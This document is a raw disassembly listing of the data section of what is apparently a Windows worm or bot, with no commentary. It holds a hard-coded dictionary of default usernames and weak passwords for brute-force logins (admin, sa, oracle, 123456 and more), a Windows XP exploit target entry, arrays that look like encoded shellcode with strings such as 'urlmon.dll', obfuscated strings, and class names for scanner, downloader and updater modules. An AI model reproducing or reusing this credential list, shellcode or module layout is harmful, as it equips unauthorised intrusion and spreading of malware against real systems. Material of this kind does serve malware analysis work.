dword_424628 dd 42Ah ; DATA XREF: sub_41A9DE+2CB�r
dword_42462C dd 3E8h ; DATA XREF: sub_41A9DE+4ED�r
dword_424630 dd 258h ; DATA XREF: sub_41A9DE+318�r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_424644 dd 20804h ; DATA XREF: sub_41A9DE+506�r
; sub_41A9DE+512�r ...
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
off_424650 dd offset byte_41EF0B ; DATA XREF: sub_41B1A0:loc_41B27D�r
; sub_41B1A0+EE�o
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_0 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dd offset aBadAllocatio_9 ; "bad allocation"
dd offset aBadAllocati_10 ; "bad allocation"
dword_424894 dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_41411F+78�o
dd 0F3E2FEEBh, 0
dword_4248B0 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_41411F+182�o
dd 0F3E2FEEBh, 2 dup(0)
dword_4248D0 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_41432A+38�o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 4200D0h
dword_4249C0 dd 0 ; DATA XREF: sub_416AE0+6E�r
dword_4249C4 dd 0 ; DATA XREF: sub_416AE0+75�r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_424A00 dd 0 ; DATA XREF: sub_416AE0+8B�r
dword_424A04 dd 80000000h ; DATA XREF: sub_416AE0+91�r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset aBadAllocati_12 ; "bad allocation"
dd offset aBadAllocati_13 ; "bad allocation"
dword_424A48 dd 0BBEDEDF4h, 0E1F0FBFCh, 0FBBBF6E5h, 0E1F0h, 7Ch dup(0)
; DATA XREF: .text:0041C020�o
dword_424C48 dd 0E5F4A6E7h, 0E7A6h, 7Eh dup(0) ; DATA XREF: .text:0041C01B�o
word_424E48 dw 1D45h ; DATA XREF: .text:loc_41C013�r
align 10h
aHjdxzopvuvmrjf db 'hJdXZOPvUVmRJfVS',0 ; DATA XREF: sub_4196D1:loc_4196FC�o
; sub_4196D1+44�r
align 4
dd 1Bh dup(0)
dword_424ED0 dd 0EDF4B6B6h, 0EDh, 3Eh dup(0) ; DATA XREF: sub_41783D+2A9�o
; sub_41783D+375�o ...
dword_424FD0 dd 0D5EDEDF4h, 0D5h, 4 dup(0) ; DATA XREF: sub_41783D+2FF�o
; sub_41783D+38F�o
byte_424FE8 db 2Eh ; DATA XREF: sub_417676+E4�r
byte_424FE9 db 0B8h, 0EDh, 0 ; DATA XREF: sub_41783D+3A5�o
dd 0Dh dup(0)
db 0
byte_425021 db 0BFh, 0D5h, 0F4h ; DATA XREF: sub_41783D+611�o
dd 0FBBBEDEDh, 0E1F0h, 0Dh dup(0)
db 0
byte_425061 db 0EFh, 0F8h, 0FAh ; DATA XREF: sub_401C1D+60�o
; sub_416F86+B8�o ...
dd 0EDF0BBFBh, 0F0h, 1Dh dup(0)
db 0
byte_4250E1 db 0CFh, 0F8h, 0A5h ; DATA XREF: .text:0041BEC5�o
dd 0FBh, 0Ch dup(0)
db 0
byte_425119 db 0CFh, 2 dup(0) ; DATA XREF: sub_416F86+A4�o
; sub_417119+7C�o ...
dd 40h dup(0)
dword_42521C dd 8 ; DATA XREF: sub_41748B+174�r
; sub_41748B+1B1�r
db 78h, 0Ch
byte_425222 db 1 ; DATA XREF: sub_40177B+8F�r
; sub_4019F3+8F�r
align 4
dd offset aBadAllocati_14 ; "bad allocation"
aGdbdADjmGjZJJN db 'У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£¤Ö¤Ô¤ÐÔÓÑЧ¤¢§¥ ££ÑÖÐצӥ'
; DATA XREF: sub_40177B+7C�o
db 'Ö¢Ó¬£ÔÖ¡¤£¢¥¡Ô¡Ó¡×Ѭ¬Ó¬¤Ó§£ÖÓЦ§Ð×£¤¢¡¦§ צ¢×פ¡Ð×Ô ÔÖ',0
align 4
dd 70h dup(0)
aNbEdGzDdnbgNdZ db '¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ¬¬¤¡Ð ¬Ô¤Ð£××¢¢¡×£¢§§Ó£¬'
; DATA XREF: sub_4019F3+7C�o
db 'У¬¢¢Ô¡¬§Ó¤Ñ¡¦¥¡¢ÑÓ¤¢¡ÖÐ׬Ԭ ÐÔ¡¦Ö×£¡§ §££¢£××Ч¢×ÑÖ Ð¦Ð ',0
align 4
dd 10h dup(0)
asc_425528 db 'ÛÜÖÞ',0 ; DATA XREF: sub_41802F+216�o
; sub_41829C+27�o
align 10h
db 0
asc_425531 db 'ÅÔÆÆ',0 ; DATA XREF: sub_41802F+13E�o
align 4
db 2 dup(0)
asc_42553A db 'ÀÆÐÇ',0 ; DATA XREF: sub_41802F+227�o
align 10h
db 3 dup(0)
asc_425543 db 'ÅÜÛÒ',0 ; DATA XREF: sub_41783D+1CF�o
dd 0
asc_42554C db 'ÅÚÛÒ',0 ; DATA XREF: sub_41783D+22F�o
align 4
db 0
asc_425555 db 'ÞÜÖÞ',0 ; DATA XREF: sub_41783D+1DF�o
align 4
db 2 dup(0)
asc_42555E db 'ßÚÜÛ',0 ; DATA XREF: sub_41783D+2EC�o
; sub_41783D+355�o
align 4
db 3 dup(0)
asc_425567 db 'ØÚÑÐ',0 ; DATA XREF: sub_41783D+365�o
align 10h
asc_425570 db 'ÅÇÜÃØÆÒ',0 ; DATA XREF: sub_417361+A4�o
; sub_41783D+1EF�o
align 10h
dword_425580 dd 0E5E1E1FDh, 0E2BABAAFh, 0F1BBE2E2h, 0F0FEFBF0h, 0F0E3FAFBh
; DATA XREF: sub_41A5C1+123�o
; sub_41A9DE+408�o
dd 0FBF0F1E7h, 0BBFBF0FEh, 0E2BAF9FBh, 0FAF9F7F0h, 0F8FCBAF2h
dd 0E6F0F2F4h, 0FAF8EFBAh, 0EDF0BBFBh, 0F0h, 420350h
dword_4255BC dd 5348h, 4204B8h, 4204D4h, 4206C8h, 4206D8h, 42070Ch
; DATA XREF: sub_418C40+20�o
; sub_418C40+8E�o
dd 42071Ch, 420734h
dword_4255DC dd 80000002h, 80000001h, 420A4Ch ; DATA XREF: sub_419A9F+6B�o
dword_4255E8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_4198D2+3D�o
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9
off_425900 dd offset off_41D38C ; DATA XREF: .rdata:00420E8C�o
; .rdata:00420EAC�o
align 8
a_?avclsmodule@ db '.?AVclsModule@@',0
off_425918 dd offset off_41D38C ; DATA XREF: .rdata:00420ED4�o
; .rdata:00420EFC�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_425938 dd offset off_41D38C ; DATA XREF: .rdata:00420F24�o
; .rdata:00420F48�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_425958 dd offset off_41D38C ; DATA XREF: .rdata:00420DE4�o
; .rdata:00420F94�o ...
align 10h
a_?avexception@ db '.?AVexception@std@@',0
off_425974 dd offset off_41D38C ; DATA XREF: .rdata:00420F70�o
; .rdata:00420FC8�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_425990 dd offset off_41D38C ; DATA XREF: .rdata:00420FF0�o
; .rdata:00421014�o
align 8
a_?avmdlupd@@ db '.?AVmdlUPD@@',0
align 4
off_4259A8 dd offset off_41D38C ; DATA XREF: .rdata:0042103C�o
; .rdata:00421060�o
align 10h
a_?avmdldl@@ db '.?AVmdlDL@@',0
off_4259BC dd offset off_41D38C ; DATA XREF: .rdata:00421088�o
; .rdata:004210AC�o
dd 0
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_4259D8 dd offset off_41D38C ; DATA XREF: .rdata:004210D4�o
; .rdata:004210F8�o
align 10h
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_4259F4 dd offset off_41D38C ; DATA XREF: .rdata:00421120�o
; .rdata:00421144�o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 10h
off_425A10 dd offset off_41D38C ; DATA XREF: .rdata:0042116C�o
; .rdata:00421190�o
align 8
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_425A2C dd offset off_41D38C ; DATA XREF: .rdata:004211B8�o
; .rdata:004211DC�o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 4
off_425A48 dd offset off_41D38C ; DATA XREF: .rdata:00421204�o
; .rdata:00421228�o
align 10h
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 7 dup(0)
dword_425A80 dd 0 ; DATA XREF: sub_402E33+4�w
; sub_402F39+3�r
dword_425A84 dd 0 ; DATA XREF: sub_40304B+2B�o
; .text:loc_41C52A�w ...
align 10h
dword_425A90 dd 0 ; DATA XREF: sub_40304B:loc_40306F�r
; sub_40304B+32�w
dword_425A94 dd 0 ; DATA XREF: .text:00404055�w
; sub_40ABE1:loc_40ABF3�r ...
dd 0
dword_425A9C dd 0 ; DATA XREF: sub_403ED3�r
; sub_40F6C2+15�r ...
dword_425AA0 dd 0 ; DATA XREF: sub_40468E+8F�w
; .rdata:off_41D3F8�o
dword_425AA4 dd 0 ; DATA XREF: sub_40468E+99�w
dd 0
dword_425AAC dd 0 ; DATA XREF: sub_40468E+8A�w
dd 10h dup(0)
dword_425AF0 dd 0 ; DATA XREF: sub_40468E+BF�w
; sub_40468E+DF�r
align 8
dword_425AF8 dd 0 ; DATA XREF: sub_40468E+7B�w
; .rdata:0041D3FC�o
dd 22h dup(0)
word_425B84 dw 0 ; DATA XREF: sub_40468E+4F�w
align 4
word_425B88 dw 0 ; DATA XREF: sub_40468E+48�w
align 4
word_425B8C dw 0 ; DATA XREF: sub_40468E+41�w
align 10h
word_425B90 dw 0 ; DATA XREF: sub_40468E+3A�w
align 4
dword_425B94 dd 0 ; DATA XREF: sub_40468E+26�w
dword_425B98 dd 0 ; DATA XREF: sub_40468E+20�w
dword_425B9C dd 0 ; DATA XREF: sub_40468E+1A�w
dword_425BA0 dd 0 ; DATA XREF: sub_40468E+14�w
dword_425BA4 dd 0 ; DATA XREF: sub_40468E+E�w
dword_425BA8 dd 0 ; DATA XREF: sub_40468E+9�w
dword_425BAC dd 0 ; DATA XREF: sub_40468E+60�w
dword_425BB0 dd 0 ; DATA XREF: sub_40468E+68�w
; sub_40468E+85�r
word_425BB4 dw 0 ; DATA XREF: sub_40468E+33�w
align 4
dword_425BB8 dd 0 ; DATA XREF: sub_40468E+57�w
dword_425BBC dd 0 ; DATA XREF: sub_40468E+70�w
word_425BC0 dw 0 ; DATA XREF: sub_40468E+2C�w
align 4
dd 80h dup(0)
dword_425DC4 dd 0 ; DATA XREF: sub_404A44+15�w
; sub_404A44+1D�w ...
word_425DC8 dw 0 ; DATA XREF: sub_404C69+E7�w
align 4
dd 2 dup(0)
dword_425DD4 dd 4E4h ; DATA XREF: sub_404C69+C3�w
dword_425DD8 dd 0 ; DATA XREF: sub_404C69+CB�w
dword_425DDC dd 0 ; DATA XREF: sub_404C69+D3�w
dword_425DE0 dd 0 ; DATA XREF: sub_4028A9+6�r
; sub_4029E9+6�r ...
dd 8 dup(0)
off_425E04 dd offset sub_4051F6 ; DATA XREF: sub_4054D6+30�w
; sub_4054D6+51�r ...
dword_425E08 dd 77E78B61h ; DATA XREF: sub_4051FF+10�r
; sub_4054D6+3D�w ...
dword_425E0C dd 77E79B39h ; DATA XREF: sub_40531A+44�r
; sub_4054D6+4A�w ...
dword_425E10 dd 77E72B29h ; DATA XREF: sub_405229+B�r
; sub_4054D6+5E�w ...
align 8
dword_425E18 dd 44C818h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_405881+4�o
; .data:off_423800�o
dword_425E30 dd 44CF88h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423808�o
dword_425E48 dd 44BC40h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423818�o
dd 44C428h, 0FFFFFFFFh, 4 dup(0)
dword_425E78 dd 44B0E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423830�o
dd 44BBF8h, 0FFFFFFFFh, 4 dup(0)
dd 44D118h, 0FFFFFFFFh, 4 dup(0)
dword_425EC0 dd 44D140h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423850�o
dword_425ED8 dd 44D168h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423860�o
dd 44D190h, 0FFFFFFFFh, 4 dup(0)
dd 44D1B8h, 0FFFFFFFFh, 4 dup(0)
dword_425F20 dd 44D1E0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: .data:00423880�o
dd 44D208h, 0FFFFFFFFh, 4 dup(0)
dd 44D230h, 0FFFFFFFFh, 4 dup(0)
dword_425F68 dd 0BC0000h ; DATA XREF: sub_402A45+7C�r
; sub_403603+62�r ...
dword_425F6C dd 0 ; DATA XREF: sub_405ADD+21�w
; sub_405B50+21C�r ...
dword_425F70 dd 0 ; DATA XREF: sub_40773A+14�r
; sub_40773A+29�r ...
dword_425F74 dd 0 ; DATA XREF: sub_40E072+19E�r
dword_425F78 dd 2 ; DATA XREF: .text:00403FE0�w
; sub_407906:loc_40792E�r ...
dword_425F7C dd 0A28h ; DATA XREF: .text:00403FF7�w
dword_425F80 dd 501h ; DATA XREF: .text:00403FE6�w
dword_425F84 dd 5 ; DATA XREF: .text:00403FEB�w
; sub_40793D+30�r
dword_425F88 dd 1 ; DATA XREF: .text:00403FF1�w
dword_425F8C dd 1 ; DATA XREF: sub_40AE54+A2�w
dword_425F90 dd 0BC2BA8h ; DATA XREF: sub_40AE54+A7�w
align 8
dword_425F98 dd 0BC2BC8h ; DATA XREF: sub_40ABE1+4B�w
; sub_40ABE1:loc_40ACA6�r ...
dd 3 dup(0)
off_425FA8 dd offset aCM_unpackerPac ; DATA XREF: sub_40AE54+37�w
; "C:\\m_unpacker\\packed.exe"
align 10h
byte_425FB0 db 0 ; DATA XREF: sub_407A0B+2C�w
; sub_40813B+5�r
align 4
dword_425FB4 dd 0 ; DATA XREF: sub_407A0B+23�w
dword_425FB8 dd 0 ; DATA XREF: sub_407A0B+1B�r
; sub_407A0B+A0�w
dword_425FBC dd 0 ; DATA XREF: sub_407F55+27�o
dword_425FC0 dd 0 ; DATA XREF: sub_407F55+22�r
dword_425FC4 dd 0 ; DATA XREF: sub_408058+4�w sub_408062�r
dword_425FC8 dd 2 ; DATA XREF: sub_4081FF+280�w
; sub_40871B:loc_408751�w ...
dd 3 dup(0)
dword_425FD8 dd 6 dup(0) ; DATA XREF: sub_409AB4+66�o
db 0
byte_425FF1 db 3 dup(0) ; DATA XREF: sub_409AB4+8A�o
dd 40h dup(0)
db 0
byte_4260F5 db 0 ; DATA XREF: sub_409AB4+92�w
align 4
dd 7Dh dup(0)
dword_4262EC dd 0 ; DATA XREF: sub_4036E0+80�r
; sub_409AB4+E3�o ...
dword_4262F0 dd 0 ; DATA XREF: sub_40A42B+8�r
align 8
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40AE54+1D�o
; .data:off_425FA8�o
align 4
dd 3Ah dup(0)
byte_4263FC db 0 ; DATA XREF: sub_40AE54+24�w
align 10h
dword_426400 dd 1 ; DATA XREF: sub_40AF0D+2�r
; sub_40AF0D+24�w ...
dword_426404 dd 77C26E79h ; DATA XREF: sub_40B11E+43�r
; sub_40B18A+11�w ...
byte_426408 db 1 ; DATA XREF: sub_40B11E:loc_40B157�r
; sub_40B18A+17�w ...
align 4
off_42640C dd offset sub_40BE59 ; DATA XREF: sub_40BEA5+C�r
; sub_40BEDC+B�w
dword_426410 dd 1 ; DATA XREF: sub_40BF57+14�r
; sub_40BF57+3A�w ...
dword_426414 dd 1 ; DATA XREF: sub_40C33C+F�r
; sub_40C33C+37�w ...
dword_426418 dd 0 ; DATA XREF: .data:off_423F3C�o
; .data:off_423F40�o ...
dword_42641C dd 77E7C706h ; DATA XREF: sub_40CAFA+4�w
; sub_40CB14+11�r ...
dword_426420 dd 0 ; DATA XREF: sub_40D5BD+A�r
dword_426424 dd 0 ; DATA XREF: sub_40DCCF+4�w
; sub_40DD29:loc_40DD72�o ...
dword_426428 dd 0 ; DATA XREF: sub_40DCCF+9�w
; sub_40DD29:loc_40DDC8�o ...
dword_42642C dd 0 ; DATA XREF: sub_40DCCF+E�w sub_40DD1C�r ...
dword_426430 dd 0 ; DATA XREF: sub_40DCCF+13�w
; sub_40DD29:loc_40DDD4�o ...
align 8
dword_426438 dd 0 ; DATA XREF: sub_40DED9+4�w
dd 2 dup(0)
dword_426444 dd 0 ; DATA XREF: sub_40DEE3+4�w
dd 0Fh dup(0)
dword_426484 dd 0 ; DATA XREF: sub_4081FF+6�r
dword_426488 dd 0 ; DATA XREF: sub_40F524+10�r
; sub_40F524+60�w ...
dword_42648C dd 0 ; DATA XREF: sub_40F524+75�w
; sub_40F524:loc_40F672�r
dword_426490 dd 0 ; DATA XREF: sub_40F524+82�w
; sub_40F524+167�r
dword_426494 dd 0 ; DATA XREF: sub_40F524+D0�w
; sub_40F524:loc_40F5F9�r
dword_426498 dd 0 ; DATA XREF: sub_40F524+BA�w
; sub_40F524+E1�r ...
align 10h
dword_4264A0 dd 0 ; DATA XREF: sub_40F76B+F�w
dd 2Fh dup(0)
dword_426560 dd 0 ; DATA XREF: sub_410889:loc_4108B1�r
byte_426564 db 0 ; DATA XREF: sub_410A54:loc_410B90�r
align 4
dword_426568 dd 0 ; DATA XREF: sub_419A10+4B�r
; sub_419EA0+E6�w ...
dword_42656C dd 0 ; DATA XREF: sub_419948+14�r
; sub_4199AC+14�r ...
dword_426570 dd 0 ; DATA XREF: sub_4198D2+1D�r
; sub_419EA0+136�w ...
dword_426574 dd 0 ; DATA XREF: sub_419A10+1C�r
; sub_419EA0+AA�w ...
dword_426578 dd 0 ; DATA XREF: sub_419EA0+BE�w
; sub_419EA0+16D�r ...
dword_42657C dd 0 ; DATA XREF: sub_419EA0+D2�w
; sub_419EA0+179�r ...
dword_426580 dd 0 ; DATA XREF: sub_419948+34�r
; sub_4199AC+34�r ...
dword_426584 dd 0 ; DATA XREF: sub_419A10+63�r
; sub_419EA0+FA�w ...
dword_426588 dd 0 ; DATA XREF: sub_419EA0+14A�w
; sub_419EA0+322�r
dword_42658C dd 0 ; DATA XREF: sub_419EA0+96�w
; sub_419EA0+155�r ...
dword_426590 dd 0 ; DATA XREF: sub_419948+4D�r
; sub_4199AC+4D�r ...
dword_426594 dd 0 ; DATA XREF: sub_401C1D+6D�r
; sub_418B1F+A9�w ...
dword_426598 dd 0 ; DATA XREF: sub_401CC0+14F�r
; sub_41748B+11D�r ...
dword_42659C dd 0 ; DATA XREF: sub_401CC0+149�r
; sub_41748B+116�r ...
dword_4265A0 dd 0 ; DATA XREF: sub_401CC0+143�r
; sub_418DA0+61�w
dword_4265A4 dd 0 ; DATA XREF: sub_401CC0+13D�r
; sub_418DA0+66�w
dword_4265A8 dd 0 ; DATA XREF: sub_401CC0+137�r
; sub_418DA0+71�w
dword_4265AC dd 0 ; DATA XREF: sub_401CC0+12A�r
; sub_418DA0+76�w
dword_4265B0 dd 0 ; DATA XREF: sub_418D5A�r
; sub_418D5A:loc_418D8F�w ...
dword_4265B4 dd 0 ; DATA XREF: sub_418D5A+5�r
; sub_418D5A+3B�w ...
dword_4265B8 dd 0 ; DATA XREF: sub_418D5A+15�r
; sub_4192FB+20�w ...
dword_4265BC dd 0 ; DATA XREF: sub_4192FB+25�w
dd 33h dup(0)
dword_42668C dd 2 dup(0) ; DATA XREF: sub_4192FB+43�o
word_426694 dw 0 ; DATA XREF: sub_41835D+8�o
; sub_418B1F+AE�w ...
word_426696 dw 0 ; DATA XREF: sub_418B1F+D1�w
dword_426698 dd 0 ; DATA XREF: sub_418B1F+BD�w
dd 2 dup(0)
dword_4266A4 dd 0 ; DATA XREF: sub_418C40+6�r
; sub_418C40+73�r ...
dword_4266A8 dd 41h dup(0) ; DATA XREF: sub_418552+1ED�o
; sub_418552+224�o ...
dword_4267AC dd 0 ; DATA XREF: sub_41835D+D�r
; sub_418B1F+84�w ...
byte_4267B0 db 0 ; DATA XREF: sub_418552+293�o
; sub_418552+477�o ...
align 4
dd 40h dup(0)
byte_4268B4 db 0 ; DATA XREF: sub_401F1C:loc_401F83�r
; sub_418B1F+117�w ...
align 4
dword_4268B8 dd 41h dup(0) ; DATA XREF: sub_418552:loc_41876F�o
; sub_418B1F+1A�o
dword_4269BC dd 0 ; DATA XREF: sub_40177B+263�o
; sub_4019F3+215�o ...
byte_4269C0 db 0 ; DATA XREF: sub_413A2D+53D�r
; sub_418301:loc_418331�r ...
align 4
dd 8 dup(0)
dword_4269E4 dd 0 ; DATA XREF: sub_41B5D2+33�w
; sub_41B5D2+8F�r ...
dword_4269E8 dd 40h dup(0) ; DATA XREF: sub_41B3D0+49�o
; sub_41B775+21�o
byte_426AE8 db 0 ; DATA XREF: sub_401CC0+16B�o
; sub_41A391+D7�o ...
align 4
dd 3Fh dup(0)
dword_426BE8 dd 0 ; DATA XREF: sub_401CC0+170�r
; sub_41A391+45�o
dword_426BEC dd 0 ; DATA XREF: sub_401CC0+17E�r
; sub_41A391:loc_41A51C�w ...
byte_426BF0 db 0 ; DATA XREF: sub_401F1C+4B7�w
align 4
dd 3Fh dup(0)
dword_426CF0 dd 0 ; DATA XREF: sub_401F1C+44A�r
; sub_401F1C+483�w
dd 3 dup(0)
db 0
byte_426D01 db 0 ; DATA XREF: sub_401F1C:loc_4020A2�r
; sub_40243A+AF�w
align 10h
dword_426D10 dd 0 ; DATA XREF: sub_40243A:loc_4024C3�r
dd 330Bh dup(0)
dword_433940 dd 0 ; DATA XREF: sub_40251A+A6�r
; sub_418552+501�r ...
db 0
byte_433945 db 0 ; DATA XREF: sub_401F1C+3E�r
; sub_41B5D2:loc_41B60E�w ...
align 4
dword_433948 dd 0 ; DATA XREF: sub_41B5D2+13B�w
dword_43394C dd 0 ; DATA XREF: sub_40251A+90�r
; sub_41B3D0:loc_41B53E�w ...
dword_433950 dd 5Eh dup(0) ; DATA XREF: sub_41A9DE+48A�o
dword_433AC8 dd 5Dh dup(0) ; DATA XREF: sub_41A9DE+4AD�o
dword_433C3C dd 0 ; DATA XREF: sub_417676+110�o
; sub_41BB84+43�o ...
dword_433C40 dd 0BC3990h ; DATA XREF: sub_417676+109�r
; sub_417676+122�r ...
dword_433C44 dd 8 ; DATA XREF: sub_40121E+20�r
; sub_40121E:loc_40127B�w ...
dword_433C48 dd 0 ; DATA XREF: sub_40243A+F�o
; sub_413F8F+14�o ...
dword_433C4C dd 0BC3AA8h ; DATA XREF: sub_40243A:loc_402453�r
; sub_40243A:loc_402462�r ...
dword_433C50 dd 0 ; DATA XREF: sub_4016BA+20�r
; sub_4016BA:loc_401717�w ...
off_433C54 dd offset off_420AEC ; DATA XREF: sub_41C370+5C�o
; sub_41C370+66�w
off_433C58 dd offset off_420AE4 ; DATA XREF: sub_41C370+40�o
; sub_41C370+4A�w
off_433C5C dd offset off_420B04 ; DATA XREF: sub_41C370+78�o
; sub_41C370+82�w
off_433C60 dd offset off_420BC4 ; DATA XREF: sub_41C370+94�o
; sub_41C370+9E�w
